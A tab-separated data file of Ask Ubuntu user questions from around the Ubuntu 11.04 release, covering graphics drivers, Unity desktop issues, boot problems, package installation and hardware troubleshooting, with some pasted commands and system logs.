40592	ati : multiple video card / monitor setup -- need help getting it working	so i currently have a dual-ati video card setup on my laptop . a low-power one and a high power one . in windows 7 the drivers switch video cards when on external vs internal power . also one of the video cards contains an hdmi output which i would like to use as it lets me plug in my monitor . so is there an easy way to configure this ? video cards : radeon hd 4200 - low power radeon hd 5600 - high power ( contains the hdmi output ) potential acceptable solutions : deactivate low power card and use high power only . worse battery life but whatever . however i do n't want this done in bios since i want the good behavior in windows when dual booting . get low power card working without high power card but hdmi output needs to work so i can plug monitor in . some progress : aticonfig -- adapter=all -- initial finds both adapters after restart . the problem is x can not start . it goes to black screen and must be restarted . aticonfig -- list-adapters only shows one adapter in a working config . the undesirable configuring the high power adapter leads to same x not loading as -- adapter=all
40594	an alternative software to live writer ?	i want a software for blogging like live writer in linux and gnome . do you have any idea ?
40599	how do i know the port of email when sending through local mail ?	gmail smtp port is working to send mail ... . but if i want to use other than gmail how can i know the port no ... .pl help regards , ramya
40602	how can i change the icon colors , appearance , etc . at the top panel ?	i am new to ubuntu linux software , and i need help changing the colors of the icons at the very top panel , where the power button , volume , bluetooth , and all those sorts of icons sit . they 're kind of hard to see , and the writing is not that clear . detailed answers would be nice . thank you .
40604	why does my computer make noises ?	my computer seems to have troubles with noises . its a kind of a scratchy , repeated , croaky noise . and it is very disturbing and annoying to the peers around me . i dont know where and how much it is to fix it , and i am pretty sure its expensive . i dont know the reasons to this noise either . it may be the fan broken ? some people tell me that something is loose inside and it may crash my commputer at any moment . i need help ! thanks . lauren
40615	make a launcher for a privileged terminal command	i want to make a launcher that will do privileged ( requires root ) commands , but i do n't want to see the terminal or have to type my password into the terminal . so i found the command , gksudo that allows me to enter my password so that i can escalate my privilege level . now i want to couple this , so that i can change the partition priority using this command cgpt add -i 6 -p 0 -s 0 /dev/sda ( this command is privileged ) and have it automatically reboot from this one launcher . i setup a luncher like this : name : chromeos description : command : gksudo gnome-terminal -e `` cgpt add -i 6 -p 0 -s 0 /dev/sda ; reboot '' comment : but it does not work . any tips ?
40616	what is the reason application menus in the top bar are hidden by default ?	why are the application-specific menus in the top bar of unity hidden by default , and showing up when you hover over them ? it seems to me that it would make more sense to display them always , so that 's why i 'd like to know what rationale there is for this ?
40619	removed winxp association to u1 , and ca n't get it to work anymore	after testing the windows client for u1 sync , i decided to test the preferences ' settings , and tried to remove the association for the winxp station from which i was working . now i can start the client , but if i try to open the preferences ' settings the application stops . i tried to uninstall and reinstall , but that wo n't change the situation : apparently the old settings are kept the same even after a total reinstall .
40620	what 's the feature name in unity that allows windows to be tiled on the left and right sides of the screen ?	in unity , when you drag title bar of window , and point it to left side or right one it maximizes to half screen ( full height , half width ) .. what 's the name of this feature ? how to install it on 10.10 without upgrading to 11.04 so i can see two window side by side ?
40621	corrupt plymouth boot screen when using properietary nvidia drivers	i recently got the final version of ubuntu natty narwhal x64 and everything is working just fine . the only thing i am having trouble with is the boot screen . after i installed the proprietary nvidia drivers , the boot screen becomes corrupt and only shows text ( as it has been doing since ubuntu 10.04 ) . when i followed the instructions to fix the boot screen in 10.04 and 10.10 , the boot screen still remains the same and the problem is n't resolved . please give a full guide on how to fix this problem . machine details computer : hp pavilion p6240in processor : core 2 duo memory : 4096 megabytes graphics : nvidia g210 3d graphics monitor : dell 17 inch lcd another question i would like to ask is whether it is possible to use this script ( http : //www.webupd8.org/2010/10/script-to-fix-ubuntu-plymouth-for.html ) with 11.04 . i am asking this question because it says that the script works only with 10.04 and 10.10 .
40623	what is the shortcut to lock computer ?	what is the shortcut to lock computer ?
40625	unity not working !	i just installed ubuntu 11.04 within windows 7 . after i log into ubuntu first time a message appeared something like `` hardware not supported for unity , desktop will continue in classic mode '' . so how can i get unity running ? asus g50vt ram 4g nvidia 9800m gs 512mb cpu 2.13ghz update : i installed graphics card and it worked perfectly . but the i find application and system menu in top left corner missing ? is it due to unity ? ? i want them in the position too .
40629	how to install the stackexchange data dump viewer ?	how do i install the stackexchange data dump viewer ?
40631	changing screen saver settings without completely removing gnome-screensaver and installing xscreensaver	i am on 11.04 at the moment . would like to figure out how to change the settings for screensavers without completely switching to xscreensaver . i read somewhere that it does n't play as nicely with some of gnome 's features like screen locking . i also read some guide that recommended installing xscreensaver and configuring your screen saver settings there and apparently they were supposed to be used by gnome-screensaver as well . but that did not work for me .
40635	why is the icon for the 'copy dialog ' indicator a mouse pointer ?	when copying or moving a large file i have noticed the icon for the copy dialog indicator is a mouse pointer . is this suppose to be , or is it a bug ? this is really confusing .
40639	on an hp nc6400 laptop the mute light on the mute button stays on ?	on an hp nc6400 laptop the mute light on the mute button stays on even when ubuntu is not on mute , this only is happening after i upgraded to ubuntu 11.04 , it worked fine in 10.10 . even though the mute light stays on , if you start playing a piece of music or a sound it will play and the mute light will go off for the duration of the sound and then come back on immediately after the sound has finished . pressing the mute button on and off only turns the light off for less than a second , it will immediately come back on again . the mute light will go off while i am adjusting the volume but will come back on no matter where i put the volume bar . while it does n't affect usability it is rather annoying .
40640	how do i get unity back ? `` it seems that you do not have the hardware required to run unity . please choose ubuntu classic ''	restart computer ( using ubuntu 11.4 ) and see this `` it seems that you do not have the hardware required to run unity . please choose ubuntu classic '' how do i get unity back ? oh and unity worked for like two or three days before this happened..
40641	how can i see the uds sessions ?	are the uds ( ubuntu developer summit ) sessions going to be streamed or recorded/uploaded at a later date ? if so , where can i see them ?
40644	how do i define wacom bamboo p & t area boundaries ?	i have a wacom bamboo p & t cth-661 and it works out of the box in ubuntu 11.04 . the problem is when i move the cursor over the edges of the screen , it 'jumps ' a lot ( it 's very annoying and it gets very difficult to use the unity bar or the scrollbar ) ! is there any way to define the correct area/boundaries ? i 've tried setting the area in xsetwacom ( bottom x , bottom y , top x , top y ) , but all it does is reduce the defined area ( the problem does not go away ... ) . i 've also tried maptooutput , but without success . any thoughts ?
40648	edge scrolling does n't work on hp mini 311	since upgrading from 10.10 to 11.04 , the edge scrolling on the trackpad no longer works . the touchpad tab exists under mouse in system settings . is there a known fix for this ? if not , what can i do to determine what type of touchpad is on an hp mini 311 and whether ubuntu natty sees it ?
40649	cpu scaling in unity with indicator-cpufreq	original question by some guy : cpu frequency scaling in unity ? followup : i installed the indicator-cpufreq app and ran it , but nothing appears in my indicator are . i can see that the app is running with ps -a|grep cpufreq . i tried running it with sudo as well , but no dice . trying to run the app with -v for verbose gives no extra output either . anyone have any ideas what might be wrong ?
40651	install packages without root permissions	would it be possible to install packages without admin rights ( sudo ? ) on ubuntu ? it does n't have to be system-wide , maybe a private installation within /home . i want this because i 'd like to setup my pc so that you can do anything you need without ever having to enter the escalate your privileges . this way , i can blissfully allow anyone to use my ubuntu system ( on their own account of course ) and simply telling them that whenever they are told to authenticate , dont . currently , i can run banshee , chromium , lo , save data on /home , manage my music library etc without authentication . however , i can not install say , vlc or chm reader without privileges . i understand that there are some packages that touch the inner workings of my system ( e.g linux-kernel-image ) where it wo n't make sense to have a private `` /home '' installation . and that packages are not neatly labeled `` trivial '' & `` non-trivial '' . nonetheless i would like the system ( synaptic ? ) to try and install without any rights until it can not proceed , upon which it displays the traditional `` you require authentication ''
40659	i do n't like unity , how to get rid of it ?	i just installed natty today and i think unity is worst of ubuntu till now . now i want to get rid of it . what are the possible ways ? ? can i install gnome 3 ? is it stable now ? besides if i install gnome 3 will it be possible to update ubuntu later ? or should i go for classic mode ?
40661	small issues after installing gnome 3 ( via ppa )	after considering all the risks of using gnome 3 in ubuntu 11.04 , i installed gnome 3 via ppa . fortunately , my system is working fine after the installation , but following are three issues which i want to fix . evolution is still not updated to 3.0 , thus it is using notifyosd to notify about new mails . empathy is updated to 3.0 but is not using modern gnome 3 notification system . ubuntu still uses old network manager instead of that of gnome 3 , thus , it is not integrated well with entire desktop . also , i wanted to know that how can i make ubuntu 11.04 completely stock gnome 3 , including all the default applications that it is using .
40670	grub menu missing after installation	i am running windows 7 64 bit on my comp and just installed ubuntu 11.04 64 bit after partitioning the hard drive to give ubuntu 50gb of space . i used a usb drive to try it out first and then i installed it and it worked perfectly and the asked me if i wanted to restart . i allowed it then it asked me to remove any 'installation media ' aka my usb drive and press enter . i did so but next a black screen came up with no text . i thought it was part of the installation so i left my comp and came back 15 mins later but it still was at the black screen ! i tried typing something , pressing 'esc ' and even pressing the power button but nothing happened . then i pressed the restart button and it restarted and booted into windows 7 with no trace of grub ! ! ! ! what am i supposed to do ? i 'm only a novice .
40671	graphics effect not available in 11.04 like in 10.10 ?	i used to like the graphic effects in maverick . but i can not find way to apply graphic effects in natty unlike maverick . or natty dropped those effects ? ?
40674	phpunit stop working after upgrade to 11.04	i 've just upgraded to 11.04 and now phpunit is n't working anymore : ( ( it was working fine on 10.10 ) . here is what appears in console : david @ david-p55m-ud2 : /var/www/magento $ phpunit unittests.php php warning : require_once ( php/codecoverage/filter.php ) : failed to open stream : no such file or directory in /usr/bin/phpunit on line 38 php stack trace : php 1 . { main } ( ) /usr/bin/phpunit:0 php fatal error : require_once ( ) : failed opening required 'php/codecoverage/filter.php ' ( include_path= ' . : /usr/share/php : /usr/share/pear ' ) in /usr/bin/phpunit on line 38 php stack trace : php 1 . { main } ( ) /usr/bin/phpunit:0 any suggestion ?
40677	can i configure one monitor landscape and one in picture mode at the same time ?	at the moment i am running kubuntu lucid lts on my desktop and have some relatively free time and was considering upgrading to natty . my biggest concern ( as usual ) is whether i will be able to use my video card in the way its configured now , preferably without hours of configuration pain . the pain mainly comes from me having two monitors and a single continuous desktop . one monitor is used in landscape and another in picture mode ( rotated 90 degrees clockwise ) , both having different resolutions . i remember spending hours of getting it configured when installing lucid originally as i had to tweak xorg.conf settings manually dozens of times , randr did n't work , etc . etc . i finally ended up using closed source driver as it was the only one being able to achieve the setup . i also remember my colleague installing maverick on the next week after the release ; he could n't get it working with closed source nvidia drivers because newer xorg libs were n't supported ( so he had to use xorg libs from lucid ) and the open source drivers could n't get the job done . royal pain stories like this have left me with a very low expectations for linux on desktop in general and new ubuntu releases in particular . i personally do n't care which drivers to use as long as i can get the monitor setup working ( no need for any 3d acceleration , it 's my working machine ) . i have spent some time looking at forums/help/askubuntu , but i can not find any decent page confirming whether natty can achieve my desired setup as the noise/information rate is too high . my video card is ( quote from lspci -vvv ) : 02:00.0 vga compatible controller : nvidia corporation g86 [ quadro nvs 290 ] ( rev a1 ) subsystem : nvidia corporation device 0492 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 52 region 0 : memory at fa000000 ( 32-bit , non-prefetchable ) [ size=16m ] region 1 : memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] region 3 : memory at f8000000 ( 64-bit , non-prefetchable ) [ size=32m ] region 5 : i/o ports at dc80 [ size=128 ] [ virtual ] expansion rom at fbd00000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia-current , nvidiafb , nouveau so can anyone advice whether nvidia dual-monitor , rotated-screen , continuous-desktop can be achieved in natty/kubuntu ?
40681	is it possible to change the unity launcher delay to absolute zero ?	although i have seen similar questions and the hint to change it in ccsm under general options , i find it still taking way to long . i have set the edge trigger delay value to zero and still i have to wait over a second to make the launcher pop up . i ca n't believe that this really ca n't be speeded up so i am asking here . i do n't want go back to using docky instead just of that little thing .
40682	ca n't resize maximized lenses in unity	i 'm starting to enjoy every day a bit more and more unity . but till now i 'm looking for an answer to how resize the lenses in unity . it takes the whole screen and i would like to be able to resize it . i tried before searching everywhere and theres no answer to how resize it when you get the lens maximized . already tried to resize the screen to see if i can get this option but without a success .
40683	how do i share my connection with ics and an xbox 360 ?	update ok so after some playing around i found a gui way to setup internet connection sharing in ubuntu 11.04 ( natty ) , remembering that i am using gnome 3 . we have the network manager applet up top right click and choose edit connections under the wired tab highlight your wired connection and click edit ... under the ipv4 tab in the method dropdown select shared to other computers . finally restart your computer . set your xbox to automatic connection settings . the new question ... so after getting it working the only issue is that i have a strict nat type . i was wondering if anyone could help me fix that ? my settings are router is 192.168.1.1 wireless card is : - ip : 192.168.1.3 ( static ) - broadcast : 192.168.1.255 - subnet : 255.255.255.0 - dns : 192.168.1.1 the wired network sets itself as : - ip : 10.42.43.1 - broadcast : 10.42.43.255 - subnet : 255.255.255.0 the xbox sets itself as : - ip : 10.42.43.31 - subnet : 255.255.255.0 - gateway : 10.42.43.1 ( wired ip ) - dns : 10.42.43.1 ( wired ip ) i am wanting to use ics in ubuntu ( natty ) for the xbox 360 . i am struggling to find out a step by step guide to do it . basically the setup is modem - > router ( ip 192.168.1.1 ) - > laptop ( via wifi ( static ip 192.168.1.3 ) ) - > xbox ( via ethernet ) . for some reason it seems that my connections are also named a bit funny . it seems that my wifi connection is eth1 and my wired is eth0 . so a step by step guide of how to configure this is what i am after .
40684	where to configure unity global shortcuts ?	altough predefined shortcuts might be handy for some , for others they are just annoying . i found my self installing natty and losing many of my compiz features because i can not bind shortcuts keys to them . or better said : i was able to bind them , but sometimes the unity actions where executed and sometimes mine . i 'm not talking about changing a super-key or something but every unity-shortcut . i just want to deactivate shortcuts that i do n't use to be able to bind super+t , f , a , d , g , v , r etc . to my personal taste again .
40686	how to know which versions of application i can install via apt	i try to use apt-cache search gedit but there is no information about version . i am trying to install gedit 2.30.4 ( by default it is 3.x on gnome 3 ) . but there is no gedit with this version . sudo apt-get install gedit=2.30.4 # = > error so how can i figure out which versions are in repo ?
40689	usrp ca n't find firmware	i 'm on ubuntu ( 11.04 ) , i compiled gnuradio , openbts and the udh driver from the git repos . all seems to work okay , i can use my usrp1 . but when i try to execute one of the tools in : uhd-mirror/host/build/examples i get the following error : ~/uhd-mirror/host/build/examples # sudo ./benchmark_rx_rate -- rate 23 linux ; gnu c++ version 4.5.2 ; boost_104200 ; uhd_003.001.000-b4fc0d6 warning : could not locate usrp1 firmware . please install the images package . could not find any devices for : not that is the entire error message ... i do n't know what to do now , i checked the firmeware is correctly located in : /usr/local/share/usrp/rev2/ there is : srp_fpga.rbf and usrp_firmware.ihxso i thought that would match ... i even placed the file in /usr/local/share/usrp/rev4/ . i would be very pleased if somebody could check on his usrp how he has the firmeware , or if anyone has an idea where i could look to make it work . i already tried so much ... regards and thanks
40690	how create linux-libc-dev package when i compile ubuntu kernel ?	i 've compiled the last stable ubuntu kernel ( 2.6.38- ... ) following this guide : how to compile a ubuntu 10.10 kernel but in this guide does n't explain how create linux-libc-dev package for that kernel ? how do i do ? i 've tried with fakeroot debian/rules binary-arch-headers but it returns an , imho , absurd error : mkdir /home/simon/sources/kernel/ubuntu-natty/debian/linux-libc-dev/usr/include/ mkdir : can not create directory `/home/simon/sources/kernel/ubuntu-natty/debian/linux-libc-dev/usr/include/ ' : file exists make : *** [ install-arch-headers ] error 1 the error is correct but this folder is created in the same process ! !
40691	task management software for ubuntu ?	i am part of a large f/oss project ; as part of my role i need to assign tasks to people . as such , i am trying to find software that allows me to set a task ( priority , due date , description , etc ) and send it via email to someone . i would preferably like software that can send an email which can be marked by the assignee as done , and notify me of this . any suggestions ?
40693	dropbox integration without nautilus ?	is it possible to integrate dropbox in other filemanagers than nautilus ? if yes , which manager would be best suited for this , and how do i set this up ?
40697	ubuntu 11.04 and ati catalyst 11.5 graphics artifacts	i have installed ati catalyst 11.5 driver ( fglrx ) on my laptop with ubuntu 11.04 and switchable-graphics technology ( ati mobility radeon hd5470 ) . everything seems ok , fglrxinfo shows my discrete video card working , glxgears shows nearly 2000fps , unity works , no graphical problems etc . but when i try to play games , i.e . heroes of newerth ( it has native linux client ) , my display are all full of graphical blinking artifacts , i think you what i am talking about . how can i fix this ? added later : also i noticed , that when i playing video online via flash player it works good , but when i expand it to full screen , it begins to flash and other annoying artifacts added a bit later : the problem is any application ( video , game , etc . ) in fullscreen mode . i tried to check off `` full screen mode '' in game , and there were no artifacts at all , but have some periodic lags
40700	why does ubuntu cd contain a `` pics '' folder with debian-related images ?	there is a `` pics '' folder on the ubuntu cd , containing some png files , which are apparently a part of an offline html document about debian . just curious , is there any use of them somewhere in the live cd/installer ?
40703	hp ubuntu 11.04 overheat problem , any way to control ?	i bought a new hp i3 laptop and im facing a huge overheat problem on ubuntu ( only cuz it works fine on windows 7 ) . any time im working one ubuntu and running multi programs at same time i get this black screen telling me that laptop will shutdown due to overheat , not to mention burning smell from the side of laptop ! on the other side windows 7 seems to be handling this temp . issue very well and i never had this problem . thank you very much
40705	any food service pos system for school districts	i 'm in search of an open source food service pos system .
40708	.conf page for firefox 's about : config	is there any such .conf file for firefox to edit about : config ?
40711	libraries used by c # executables	i am having a problem when i try to run c # executables ( compiled with mono c # compiler at 10.10 server ) inside a chroot jail . in order to run the executable inside the jail i need to include the proper libraries . to do that i use ldd for c , c++ , pascal and other languages . unfortunately this wo n't work for c # files ( `` ldd hello.exe '' states that hello.exe is not a dynamic executable ) . which libraries do c # executables use ? or do you know how ca i find them ?
40714	how to save currently playing radio station ?	if i go a a url like http : //somafm.com/play/groovesalad130 in firefox , the browser prompts me to load a *.pls file in banshee . when loaded , this successfully plays the radio station in banshee . how can i save this radio station permanently , so that i do n't have to go the web page to trigger it ? i know about the `` add a new internet radio station '' button and window , but i would like to be able to `` save '' or `` bookmark '' the currently playing station , instead of having to dig out the links myself .
40720	how can i hide the simplistic photo editing buttons in shotwell ?	i never use these buttons : how can i make them go away ?
40723	how do i install citrix receiver ?	has anyone managed to get the citrix receiver client working in 64-bit natty ( 11.04 ) . it seems libmotif4 wo n't install multi-arch ( 32 bit and 64 bit libraries ) . i also see crazy dependency errors despite the libraries being present . here is what i received initially when trying to install icaclient.deb from citrix ; sudo dpkg -i downloads/icaclient_11.100_i386.patched.deb dpkg : error processing downloads/icaclient_11.100_i386.patched.deb ( -- install ) : package architecture ( i386 ) does not match system ( amd64 ) errors were encountered while processing : downloads/icaclient_11.100_i386.patched.deb i then installed the 32 bit libraries . sudo apt-get install ia32-libs ia32-libs-gtk then i noticed libmotif4 ( a dependency of the citrix client ) was n't present so i installed the 64bit version . sudo apt-get install libmotif4 i then tried to force the 32 bit version ; sudo dpkg -- force-architecture -i downloads/libmotif4_2.3.3-5_i386.deb dpkg : warning : overriding problem because -- force enabled : package architecture ( i386 ) does not match system ( amd64 ) selecting previously deselected package libmotif4 : i386 . dpkg : error processing downloads/libmotif4_2.3.3-5_i386.deb ( -- install ) : libmotif4 : i386 2.3.3-5 ( multi-arch : no ) is not co-installable with libmotif4 : amd64 2.3.3-5ubuntu1 ( multi-arch : no ) which is currently installed so i uninstalled the 64 bit version and tried to install the 32 bit version . this worked , but when i attempt to install citrix i enter dependency hell . sudo dpkg -- force-architecture -i downloads/icaclient_11.100_i386.patched.deb dpkg : warning : overriding problem because -- force enabled : package architecture ( i386 ) does not match system ( amd64 ) selecting previously deselected package icaclient : i386 . ( reading database ... 183036 files and directories currently installed . ) unpacking icaclient : i386 ( from ... /icaclient_11.100_i386.patched.deb ) ... dpkg : dependency problems prevent configuration of icaclient : i386 : icaclient : i386 depends on libc6 ( > = 2.3 ) . icaclient : i386 depends on libice6 ( > = 1:1.0.0 ) . icaclient : i386 depends on libsm6 . icaclient : i386 depends on libx11-6 . icaclient : i386 depends on libxaw7 . icaclient : i386 depends on libxext6 . icaclient : i386 depends on libxmu6 . icaclient : i386 depends on libxp6 . icaclient : i386 depends on libxpm4 . icaclient : i386 depends on libxt6 . dpkg : error processing icaclient : i386 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : icaclient : i386 so the state it 's in , there 's no icaclient binaries installed only the docs . it is complaining about libraries that are indeed present ( libc6 64 bit and 32 bit ) . libmotif4 is only 32 bit installed and wo n't install alongside libmotif4 64 bit . libmotif4 error when you try to install it alongside the 32bit instance ; libmotif4 : amd64 2.3.3-5 ( multi-arch : no ) is not co-installable with libmotif4 : i386 2.3.3-5ubuntu1 ( multi-arch : no ) which is currently installed any tips ?
40725	random freezes followed by loss of wifi connection with a bcm4313 wireless card	i did a clean install of natty narwhal on my aspireone d255 netbook . right off the bat , it seems to work right out of box , but from time to time ( especially shortly after booting up or resuming from sleep ) , mouse cursor would freezes , followed by a drop in wifi connection . can anyone go about suggesting how to troubleshoot this annoyance ? just some background information . my system is not powerful enough to run unity , so it is under classic mode at the moment . here is the output from lspci 00:00.0 host bridge : intel corporation n10 family dmi bridge 00:02.0 vga compatible controller : intel corporation n10 family integrated graphics controller 00:02.1 display controller : intel corporation n10 family integrated graphics controller 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation nm10 family lpc controller ( rev 02 ) 00:1f.2 sata controller : intel corporation n10/ich7 family sata ahci controller ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 01:00.0 ethernet controller : atheros communications ar8152 v1.1 fast ethernet ( rev c1 ) 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) here is the excerpt from dmesg [ 8127.020293 ] eth1 : no ipv6 routers present [ 8154.099945 ] psmouse.c : touchpad at isa0060/serio1/input0 lost synchronization , throwing 1 bytes away . [ 8155.128208 ] psmouse.c : resync failed , issuing reconnect request [ 8195.396010 ] atl1c 0000:01:00.0 : atl1c : eth0 nic link is up < 100 mbps full duplex > [ 8195.924818 ] addrconf ( netdev_change ) : eth0 : link becomes ready [ 8210.300491 ] psmouse.c : touchpad at isa0060/serio1/input0 lost synchronization , throwing 5 bytes away . [ 8215.851447 ] atl1c 0000:01:00.0 : irq 45 for msi/msi-x [ 8217.129771 ] atl1c 0000:01:00.0 : atl1c : eth0 nic link is up < 100 mbps full duplex > [ 8217.651271 ] psmouse.c : resync failed , issuing reconnect request [ 8219.160058 ] eth0 : no ipv6 routers present
40729	how to downgrade firefox to 3.6.15 ?	i have the source code in tar.bz2 but when i tried these instructions on http : //www.cyberciti.biz/faq/install-firefox-4-0-tar-bz2-in-linux/ it 's just opening firefox 4 ( this instruction is to install firefox 4 but i changed 4 to 3.6.16 ) . thanks .
40730	copy file to dir using wildcards or regular expression in destination ?	i want execute this cp debian.master/abi/2.6.38*/amd64/generic debian.master/abi/2.6.38*/amd64/core2 but bash gives error in second * : cp : can not create regular file `debian.master/abi/2.6.38*/amd64/core2 ' : no such file or directory how can i copy one file in same dir but when other name without to change of dir nor to write the entire folder name ?
40732	how do i get spaces instead of tabs in nano ?	i usually edit python files with nano , so i need four spaces instead of a tab . how can i get nano to automatically insert spaces for tabs , and control how many of them it inserts ?
40733	maximizing a window moves minimize , maximize and close button to the left	i want when i maximized a window for the minimize , maximize and close buttons to not go left but stay right like in ubuntu 10.10 . thanks
40743	how do i get the microphone working on an acer zg8 ?	microphone is not working . any ( quick ) fix ? **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc272x analog [ alc272x analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0
40744	how to increase speaker volume ?	i have an ubuntu laptop , and can control the speaker volume with the built in keys . however , the max volume is still pretty low in some applications . can i amplify the voice output further somehow ?
40747	active area of flash buttons dislocated	after upgrading to 11.04 i noticed that in some online flash games like cursed treasure the active area of the buttons is not located any longer on the graphic of the button but is randomly off . this means if i go with the mouse on the button it is n't highlighted and a mouse click does not active it . i have to search around the button to find the active area . also when i try to place towers on the game field ( its a td game ) then i can also notice an offset . it seems that the mouse courser is not at the position as it is displayed . the offset is changing after the browser window containing the flash game is scrolled up or down a little . this seems to be similar to strange `` gap '' at the top of windows when first opened ? , but also happens when the window is displayed correctly . i 'm using the 64-bit version of ubuntu 11.04 with the normal firefox 4.0.1 . i installed the 64-bit adobe flash plugin with the version 10,3,162,29 from the adobe website by copying the plugin to the correct position .
40751	no updates from the 11.04 natty repositories since 30th of april ?	since the release of 11.04 , i have n't received any updates from the repositories for 11.04.i installed the beta version , and as far as i 've understood i 'm currently running on the released version . i ca n't really believe there has n't been a single patch or update since 30th of april .
40761	how secure is the ubuntuone nightlies repos ?	for my computers with natty ubuntuone only works more or less stable with the nightlies releases ( https : //launchpad.net/~ubuntuone/+archive/nightlies ) . my main concern is , when i add the repo to my apt sources i get prompted with a warning that says that the key is not trustworthy . now , how serious is this ? i 'm syncing tons of personal data - so i wonder whether i can trust nightlies or whether i should not use it ? any idea ? how big is the chance that my data are being read by a third party ?
40763	symlink for dbus headers	source code for something that wo n't compile has the line # include but in real life that header file is in /usr/include/dbus-1.0/ similarsituation exists for the dbus-c++ package . why does n't ubuntu provide a symlink /usr/include/dbus pointing to the dbus-1.0 directory ? is this an bug in the dbus package ? if intended , what it the purpose ? is it a proper fix to add a symlink myself ? ( changing the source is not practical - there are many files , and they need to match what other people have . ) update : ok , i totally misunderstood the situation , though it still comes down to a problem i think should be solved by a symlink . the dbus directory referred to in the # include statement is a deeper level directory under /usr/include/dbus-1.0/ . the real problem is that the file dbus-arch-deps.h appears to be missing , but is actually stored in the weird location /usr/lib/x86_64-linux-gnu/dbus-1.0/include/dbus/ so now - why does n't ubuntu provide a symlink to this in /usr/include/dbus-1.0/dbus , or actually store it there ?
40775	ubuntu unity not showing all eclipse menus	hi i just upgraded to natty and i was giving a sporting chance to unity . there a lot of things i liked about it ( ease of search , zooming , ... ) but the issue that made me switch to `` classic '' is that eclipse was just showing 1 of the 10 menus ( windows ) any way i can coax unity to show all ten of them ? ciao stefano
40777	does sabayon work in 11.04 ?	i have been very interested in giving sabayon ( profile editor ) a try but i can not seem to get it working properly . after installing it via `` sudo apt-get install sabayon '' , i am able to open it via `` sudo sabayon '' . i create a profile , but whenever i click the edit button i get the following error : i 'm wondering if anyone else is experiencing this issue , or does anyone know if there is some sort of fix ? here is the log file for the error that was located in /root : ===== begin milestones ( /usr/bin/sabayon ) ===== mainthread 2011/05/06 13:54:03.6592 ( admin-tool ) : creating profiles dialog mainthread 2011/05/06 13:54:03.6989 ( admin-tool ) : starting main loop mainthread 2011/05/06 13:54:07.0527 ( admin-tool ) : got fatal error : sabayon-session exited with a fatal error ( exit code 1 ) mainthread 2011/05/06 13:54:07.1172 ( admin-tool ) : terminating main loop mainthread 2011/05/06 13:54:07.1172 ( admin-tool ) : exiting abnormally ; dumping log due to a fatal error ===== end milestones ( /usr/bin/sabayon ) ===== ===== begin ring buffer ( /usr/bin/sabayon ) ===== mainthread 2011/05/06 13:54:03.6592 ( admin-tool ) : creating profiles dialog mainthread 2011/05/06 13:54:03.6989 ( admin-tool ) : starting main loop mainthread 2011/05/06 13:54:06.3275 ( user ) : starting to edit profile 'test' mainthread 2011/05/06 13:54:07.0527 ( admin-tool ) : got fatal error : sabayon-session exited with a fatal error ( exit code 1 ) mainthread 2011/05/06 13:54:07.1134 ( user ) : finishing editing profile mainthread 2011/05/06 13:54:07.1172 ( admin-tool ) : terminating main loop mainthread 2011/05/06 13:54:07.1172 ( admin-tool ) : exiting abnormally ; dumping log due to a fatal error ===== end ring buffer ( /usr/bin/sabayon ) ===== this configuration for the debug log can be re-created by putting the following in /etc/sabayon/sabayon-debug-log.conf ( use ' ; ' to separate domain names ) : [ debug log ] max lines = 1000
40779	how do i install a .deb file via the command line ?	how do i install a .deb file via the command line ?
40780	how to remove/ignore most recent kernel ?	after the most recent kernel upgrade , my system hangs during boot . since my machine seems especially persnickety about pulling up the grub menu* , what is the best way to set the previous kernel as the default until the next upgrade ? *i have to hit esc at exactly the right moment , which usually means rebooting several times until i get it .
40783	my gnome-shell gtk theme is really ugly	i have installed gnome shell on my ubuntu 11.04 . it gave me an error about e : /var/cache/apt/archives/gnome-session_3.0.1-0ubuntu1~build1_all.deb : trying to overwrite '/usr/share/gnome-session/sessions/gnome.session ' , which is also in package gnome-session-common 2.32.1-0ubuntu20 after a while with -f and stuff i managed to get gnome shell to work but the gtk theme looks very ugly . so i want to update and install the standard gnome theme and it gives me this error : the following packages have unmet dependencies : gnome-shell : depends : libcamel1.2-19 ( < 2.33 ) but 2.32.2-0ubuntu2 is installed depends : libffi5 ( > = 3.0.4 ) but 3.0.9-3ubuntu1 is installed depends : libnspr4 ( > = 4.7.0~1.9b1 ) but 4.8.7-0ubuntu1 is installed depends : libnss3 ( > = 3.12.2~rc1 ) but 3.12.9+ckbi-1.82-0ubuntu2 is installed depends : libsqlite3-0 ( > = 3.7.3 ) but 3.7.4-2ubuntu5 is installed depends : libxfixes3 ( > = 1:4.0.1 ) but 1:4.0.5-1ubuntu1 is installed depends : gnome-themes-standard ( > = 2.91 ) but it is not installed what to do . i know it 's really unstable and stuff but i have some bug with gnome 2 and gnome 3 behind all of this . at least , that 's what i read out of it all . how to fix it ? thanks .
40785	synaptic `` unable to copy the user 's xauthorization file '' error	every time i start synaptic i get the following error ( in screenshot )
